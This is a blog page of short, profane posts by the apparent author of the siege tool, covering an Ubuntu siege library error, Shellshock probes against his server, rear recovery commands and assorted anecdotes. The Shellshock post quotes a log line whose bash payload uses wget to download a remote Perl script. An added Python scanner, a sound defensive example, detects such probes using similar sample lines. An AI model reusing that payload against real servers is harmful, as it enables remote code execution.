
Joe Dog Software

Proudly serving the Internets since 1999

Siege 3.x.x On Ubuntu

Your JoeDog uses Ubuntu Linux on his laptop. A few years ago he was deep in siege development and he was caught without a working copy. “I wonder if … ” Your JoeDog thought, “I wonder if Ubuntu has it.” He ran ‘sudo apt-get install siege’ and there it was, ready for installation. The Big Boys were distributing his software and Your JoeDog was convinced that he was a Somebody.

If this happens to you, if a major vendor starts to distribute your software and you feel the need to tell people about it, take an opportunity to learn this lesson: nobody gives a shit. It’s a great feeling so you’ll probably ignore it. You’ll puff your chest and tell people, “Debian is distributing my software!” Instead of a pat on the back, you’ll hear “What’s Debian?” You’ll tell them and they’ll quickly change the subject. Trust the JoeDog on this one: nobody gives a shit. Your wife might give you a poorly acted, “That’s great, honey,” but at the end of the day, your software project excites people as much as your fantasy football team.

Now turn the clock up a few years. Yesterday Your JoeDog had an encounter with a compromised Mormon dating site. He wanted to see what software they were running so he ran ‘siege -g http://singlesaints.com/’ on his snazzy new System76 laptop. Turns out he didn’t have a copy. But wait a second: Ubuntu distributes siege, remember?

“What’s Ubuntu?” — See, I told you nobody cares.

When he went to run that command with Ubuntu’s siege he got this message: ‘siege: error while loading shared libraries: libssl.so.1.0.0: No such file or directory’

In recent days, our log aggregator has been telling us that many of you are googling ‘ubuntu siege libssl’ and it suddenly became clear why you were doing that. This nerdblogger decided to investigate the cause and document it here. As a diligent nerdblogger, he uninstalled siege in order to document the problem from scratch. Funny thing. When he ran siege after the second install in order to capture the error message, there was no error message. Siege worked.

At this point all that is known is this:

  1. There appears to be a problem with siege on Ubuntu
  2. Here’s the error message: ‘libssl.so.1.0.0: No such file or directory’
  3. libssl.so.1.0.0 was installed on the laptop in which this error was encountered
  4. After removing siege with ‘sudo apt-get remove siege’ and
  5. Reinstalling it with ‘sudo apt-get install siege’
  6. It worked.
  7. Your mileage will vary. If the problem persists you should post to the Ubuntu forums 

 

 

 



Incoming!!

I don’t know about you, but Your JoeDog is shell shocked. His logs are filled with stuff like this:

173.245.53.136 - - [25/Sep/2014:16:42:37 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c "/usr/bin/wget http://singlesaints.com/firefile/temp?h=joedog.org -O /tmp/a.pl""

So what’s happening here? Basically, some asshole is trying to exploit last week’s widely publicized bash shell vulnerability to invoke wget and pull down a perl script named “a.pl”.

First of all, Your JoeDog hates scripts with an extension to designate the language in which they were coded. The person running the script doesn’t care what language it runs under. The computer will read the sh-bang line (#!/bin/perl) and call the appropriate interpreter. What’s the point of adding .pl? When you attack JoeDog’s computers please do so without a file extension, mmmmkay?

Second of all, he’s not going to find wget. On Your JoeDog’s computer it was installed in /bin/wget. But don’t bother trying to invoke it from there either. In accordance with best practice, it was moved to a non-standard location. (You should do that, too.)

So while many of us are annoyed with this vulnerability, security firms and tech news companies are peeing themselves with excitement.

Dice tells us about ThreatStream, a cyber intelligence firm who’ve released ShockPot, a shell-shock honey pot. You can set it up on a publicly accessible server and watch knuckleheads try to ‘sploit you. Sounds like somebody needs a hobby.

Dice downloaded the software package and set it up on Linode, a Linux hosting site. Within a few days, they were shell-shocked seven times. Instead of wasting their time with honey pots, they could come over here and tail Your JoeDog’s logs. He was attacked 18 times in the last eight hours.

NOTE: The script they tried to pull was hosted on singlesaints.com, a Mormon dating site located in Utah. Your JoeDog attempted to snag that file for examination and they blocked his request.

HTTP request sent, awaiting response... 403 Forbidden

Props to all the single Mormon nerds who helped fix that issue in a timely fashion.
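A way to count these probes in an access log, as an added example (not code from the original post): it flags any combined-format entry whose request line or logged headers carry the `() {` function-definition prefix and collects the URLs the payload tried to fetch. The sample lines are constructed, modelled on the entry quoted above, and assume Apache escapes embedded quotes as `\"`; the documentation-range addresses and example.invalid are placeholders.

```python
import re
from collections import Counter

# Constructed sample in Apache combined format. Line 1 mirrors the entry quoted
# in the post; the other lines, addresses and example.invalid are made up.
SAMPLE_LOG = r'''173.245.53.136 - - [25/Sep/2014:16:42:37 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=joedog.org -O /tmp/a.pl\""
198.51.100.7 - - [25/Sep/2014:16:50:02 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [25/Sep/2014:17:03:11 -0400] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "() { :;}; /bin/bash -c \"/usr/bin/wget http://example.invalid/x -O /tmp/x\"" "-"
173.245.53.136 - - [25/Sep/2014:17:20:45 -0400] "GET /cgi-bin/status HTTP/1.1" 404 209 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=joedog.org -O /tmp/a.pl\""
'''

# ip, identd, user, [timestamp], "request", status, size, then the logged headers.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<req>[^"]*)" (?P<status>\d{3}) \S+ ?(?P<headers>.*)$')
# Function-definition prefix from the post's log entry, tolerating extra spaces.
PROBE = re.compile(r'\(\)\s*\{')
URL = re.compile(r'https?://[^\s"\\]+')

def find_probes(log_text):
    """Return one record per log line that carries the probe prefix."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        # The prefix may arrive in the request line or in any logged header.
        haystack = m['req'] + ' ' + m['headers']
        p = PROBE.search(haystack)
        if p:
            hits.append({'ip': m['ip'], 'time': m['ts'],
                         'status': int(m['status']),
                         'urls': URL.findall(haystack[p.start():])})
    return hits

def summarize(hits):
    """Count probes per source address and collect the URLs they referenced."""
    per_ip = Counter(h['ip'] for h in hits)
    urls = sorted({u for h in hits for u in h['urls']})
    return per_ip, urls

if __name__ == '__main__':
    per_ip, urls = summarize(find_probes(SAMPLE_LOG))
    for ip, n in per_ip.most_common():
        print(f'{n:3d} probe(s) from {ip}')
    for u in urls:
        print('payload referenced:', u)
```

The recorded status is only a triage hint: a 301 or 404 means the request never reached a CGI script, while any other status on a flagged line deserves a closer look at the host.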

 

 



Beer Makes You Smarter

Many of you are programmers, which means you drink coffee. After all, what is a programmer but a device that turns caffeine into code? After a long day of coding nothing takes the edge off like a nice cool beer. I’ll bet many of you drink that beverage, too. Hey, look! Important beer news from the Pacific Northwest:

Researchers at Oregon State University discovered that doses of xanthohumol, a flavonoid found in hops, improved memory and thinking in a lucky group of mice.

If beer makes you smarter, then we’ll be even better programmers amirite?

it would require drinking 2,000 liters of beer a day (or 5,636 bottles of beer) to ingest the amount of xanthohumol used in the study.

The first fifty-six-hundred go down easy, it’s those last few that require a little extra effort….

 

 



The Times Discovers Bayesian Statistics

From the Article:

A famously counterintuitive puzzle that lends itself to a Bayesian approach is the Monty Hall problem, in which Mr. Hall, longtime host of the game show “Let’s Make a Deal,” hides a car behind one of three doors and a goat behind each of the other two. The contestant picks Door No. 1, but before opening it, Mr. Hall opens Door No. 2 to reveal a goat. Should the contestant stick with No. 1 or switch to No. 3, or does it matter?

A Bayesian calculation would start with one-third odds that any given door hides the car, then update that knowledge with the new data: Door No. 2 had a goat. The odds that the contestant guessed right — that the car is behind No. 1 — remain one in three. Thus, the odds that she guessed wrong are two in three. And if she guessed wrong, the car must be behind Door No. 3. So she should indeed switch.

[NY Times: The Odds, Continually Updated]

 



Rear Recovery Onto Different Hardware

Your JoeDog still likes rear.

He uses it for bare metal recovery and system cloning. Recently he had to clone one server onto older hardware as part of a disaster recovery exercise. It was problematic.

Problem one: The rear recovery disk could not connect to the network.

This system had bonded NICs and Your JoeDog started to suspect they were causing an issue. When the recovery disk booted, he brought down all the network interfaces and tried to assign a new address to the server. The routing table looked fine. The eth0 config looked fine, but the network was unreachable.

Acting on a hunch that bonded NICs were giving him fits, Your JoeDog did a recursive grep of the rear directory …

… wait a minute, what’s a recursive grep?
You can do it like this:

$ find /usr/share/rear -print | xargs egrep -i bond

Cool, thanks …

Anyway, as a result of that search, he found this feature: SIMPLIFY_BONDING. With a little more digging, he discovered that it takes ‘y’ or ‘n’, so Your JoeDog set it to y and re-archived the server. He added that directive to local.conf:

SIMPLIFY_BONDING=y

When the server booted from the new recovery disk, the only network interface was eth0. Your JoeDog reset that address with ifconfig and he was able to clone the server from his rear archive. SUCCESS!!!!

Problem two: No success! After the rear recovery, the kernel panic’d and the server wouldn’t boot. Unhappy sad time. 

Your JoeDog was all, “Hmmm I’ll bet I need to rebuild the kernel for new hardware….”

So he restored again from rear. This time, when the recovery was complete, he chroot’d the mount point and rebuilt the kernel.

… wait a minute! How do you do that?
Glad you asked. Here’s my command history:

$ chroot /mnt/local
$ export PATH=/sbin:/bin:/usr/sbin:/usr/bin
$ cd /boot
$ mkinitrd -f -v initrd-2.6.32-431.20.3.el6.x86_64kdump.img \
                 2.6.32-431.20.3.el6.x86_64

NOTE: Whatever you call the kernel, i.e., whatever you use for the second argument of mkinitrd, make sure you have a directory by the same name in /lib/modules, i.e., /lib/modules/2.6.32-431.20.3.el6.x86_64

DOUBLE NOTE: Once you’re inside /boot, do an ls to find available kernel images. They’ll begin with initrd- and end in .img

Now get yourself some rear.

 



Dunning–Kruger Effect

Your JoeDog once worked with a programmer who couldn’t program. Now you’re probably thinking, isn’t programming an important qualification for that position? Not in a large corporation. To succeed in that environment, you need buzzwords and cliches. If you have them, managers just assume you know what you’re talking about.

This particular non-programmer — or Ouch! as we liked to call him — was hired to build an Intranet site. It took him a year and a half to construct something that looked like your eight-year-old nephew slapped it together in a weekend. It was slow, poorly marked-up but at least it had a confusing layout and design. Ouch had a parry for its shortcomings: Microsoft. “IE is a horrible web browser. It violates standards and ActiveX has a mind of its own.”

An appropriate response would have been, “If that’s true, how come all these non-Ouch sites look fine and work well in IE?” Instead, he received an award.

Because Ouch could steal someone else’s files and alter their markup to render the company’s text and images, we concede that he had some skill. Armed with a comprehensive understanding of his craft, Ouch would have also known: 1.) How to work around a browser’s weaknesses by 2.) Stealing the javascript, too, as it probably fixed those weaknesses but then he would have known too much and realized 3.) He was in the wrong profession.

While Ouch was laboring over his Intranet and ankle-deep in Cold Fusion, we were building an enterprise site with J2EE. And while Ouch didn’t know much, he did know this: in nerd hierarchy, Cold Fusion falls way below java.

So Ouch told everyone — and I mean everyone, his peers, his managers, the cleaning crew that he should be programming in java. To prove his point, he got the java logo tattooed on his bicep … which he showed to everyone.

Here’s the thing: Ouch wasn’t smart enough to know he couldn’t program in java. And management wasn’t smart enough to know he couldn’t program in java. The next thing you know, Ouch was stealing O’Reilly code — including the copyright notice — and attempting to implement the usecase. As far as I can tell, in one year in that position he didn’t release a thing that wasn’t immediately rewritten by somebody else.

Eventually Ouch was sacked, but not for incompetence: he called his immediate supervisor the c-word. Management never considered him anything but a fine programmer. The buzzwords he used matched the ones they read in trade rags. How could he be anything but brilliant?

I didn’t realize it at the time but Ouch and the managers who considered him competent all suffered from the Dunning–Kruger Effect.

 



Shellshocked

Wired provides an interesting angle on the bash shell bug that has all your panties in a bind:

[Brian] Fox drove those tapes to California and went back to work on Bash, other engineers started using the software and even helped build it. And as UNIX gave rise to GNU and Linux—the OS that drives so much of the modern internet—Bash found its way onto tens of thousands of machines. But somewhere along the way, in about 1992, one engineer typed a bug into the code. Last week, more than twenty years later, security researchers finally noticed this flaw in Fox’s ancient program. They called it Shellshock, and they warned it could allow hackers to wreak havoc on the modern internet.

[Wired: The Internet Is Broken]

 



Is Hardware Outpacing Software Or Is It The Other Way Around?

Here’s an interesting experiment.

After hearing two strong players argue that the only real progress in chess engines in the last ten years was due to faster computers a special match was played to challenge this idea. Komodo 8 ran on a smartphone while a top engine of 2006 used a modern i7 computer that runs 50 times faster. This is the difference between Usain Bolt and the Concorde. Guess what happened?

 

 



Fido 1.1.3

Your JoeDog had a requirements change. “Stupid requirements!” He had to ensure each file in a directory and all its sub-directories was less than eight days old. Unfortunately, Your Fido didn’t traverse directory trees. He stood watch only at the top of the tree.

That’s the problem with dogs: they have a mind of their own.

Without much effort, fido learned a new trick. It now recursively searches a directory for files. To leverage this feature, you’ll have to give it a command. “Recurse, boy, recurse!”

/export {
 rules = exceeds 7 days
 exclude = ^.|CVS|Makefile
 action = /usr/local/bin/sendtrap.sh
 recurse = true
}

recurse takes one of two values, true or false. True means search the tree and false means remain at the top level. If you don’t set a recurse directive, then fido will treat it as false, i.e., it will remain in the top directory.

[Trending: Fido-1.1.3]